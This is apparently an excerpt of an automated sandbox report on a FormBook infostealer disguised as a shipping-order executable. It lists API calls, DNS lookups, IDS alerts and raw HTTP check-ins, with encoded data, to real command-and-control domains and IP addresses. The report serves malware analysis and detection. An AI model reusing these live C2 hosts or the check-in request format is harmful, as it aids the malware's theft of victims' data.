Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_009EC9C7
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009EC93C FindFirstFileW,FindClose,	0_2_009EC93C
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009EF200
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009EF35D
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009EF65E
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009E3A2B
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009E3D4E
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009EBF27
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_028CBC20 FindFirstFileW,FindNextFileW,FindClose,	3_2_028CBC20

Source: C:\Windows\SysWOW64\clip.exe	Code function: 4x nop then xor eax, eax		3_2_028B9870
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4x nop then mov ebx, 00000004h		3_2_0464053E

Source: Joe Sandbox View	IP Address: 23.251.54.212 23.251.54.212
Source: Joe Sandbox View	IP Address: 23.251.54.212 23.251.54.212
Source: Joe Sandbox View	IP Address: 213.145.228.16 213.145.228.16
Source: Joe Sandbox View	IP Address: 194.9.94.85 194.9.94.85

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009F25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_009F25E2

Source: global traffic	HTTP traffic detected: GET /w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.hprlz.czConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /qe66/?YXDT=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&ZH3=yf1H3v6h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.catherineviskadi.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /xzzi/?ZH3=yf1H3v6h&YXDT=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bfiworkerscomp.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /rm91/?ZH3=yf1H3v6h&YXDT=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--fhq1c541j0zr.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4hda/?YXDT=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&ZH3=yf1H3v6h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--matfrmn-jxa4m.seConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /li0t/?ZH3=yf1H3v6h&YXDT=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.anuts.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ei85/?YXDT=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&ZH3=yf1H3v6h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.telwisey.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /aroo/?ZH3=yf1H3v6h&YXDT=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.sandranoll.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /tf44/?YXDT=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&ZH3=yf1H3v6h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.gipsytroya.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /mooq/?ZH3=yf1H3v6h&YXDT=6C5pq03gIUcCxycb2ojrc6UlpUueVjiCIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGnvkmbDl/kRMbgDKTG3Ttr251X/MxPUe8WZ8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.helpers-lion.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /lfkn/?YXDT=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&ZH3=yf1H3v6h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.dmtxwuatbz.ccConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.hprlz.cz
Source: global traffic	DNS traffic detected: DNS query: www.catherineviskadi.com
Source: global traffic	DNS traffic detected: DNS query: www.hatercoin.online
Source: global traffic	DNS traffic detected: DNS query: www.fourgrouw.cfd
Source: global traffic	DNS traffic detected: DNS query: www.bfiworkerscomp.com
Source: global traffic	DNS traffic detected: DNS query: www.tinmapco.com
Source: global traffic	DNS traffic detected: DNS query: www.xn--fhq1c541j0zr.com
Source: global traffic	DNS traffic detected: DNS query: www.xn--matfrmn-jxa4m.se
Source: global traffic	DNS traffic detected: DNS query: www.anuts.top
Source: global traffic	DNS traffic detected: DNS query: www.telwisey.info
Source: global traffic	DNS traffic detected: DNS query: www.sandranoll.com
Source: global traffic	DNS traffic detected: DNS query: www.gipsytroya.com
Source: global traffic	DNS traffic detected: DNS query: www.helpers-lion.online
Source: global traffic	DNS traffic detected: DNS query: www.dmtxwuatbz.cc

Source: unknown

HTTP traffic detected: POST /qe66/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brHost: www.catherineviskadi.comOrigin: http://www.catherineviskadi.comCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 201Referer: http://www.catherineviskadi.com/qe66/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36Data Raw: 59 58 44 54 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 55 78 6c 46 66 58 56 4f 54 51 50 44 66 58 7a 61 2b 36 4f 5a 53 54 41 44 36 6b 79 56 41 65 71 65 51 3d 3d Data Ascii: YXDT=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 199.192.19.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 43.252.167.188:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49765 -> 213.145.228.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 217.160.0.106:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49738 -> 5.44.111.162:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49747 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49763 -> 199.192.19.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49741 -> 217.160.0.106:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49759 -> 23.251.54.212:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49777 -> 104.21.45.56:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49753 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 23.251.54.212:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 217.160.0.106:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49769 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 199.192.19.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49749 -> 43.252.167.188:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49767 -> 213.145.228.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49761 -> 199.192.19.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 213.145.228.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49776 -> 104.21.45.56:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 213.145.228.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49774 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49773 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49775 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49742 -> 217.160.0.106:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49757 -> 23.251.54.212:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49778 -> 104.21.45.56:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49771 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 43.252.167.188:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49751 -> 43.252.167.188:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49755 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 23.251.54.212:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49779 -> 104.21.45.56:80

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 12 Aug 2024 03:13:46 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 12 Aug 2024 03:13:49 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 12 Aug 2024 03:13:51 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
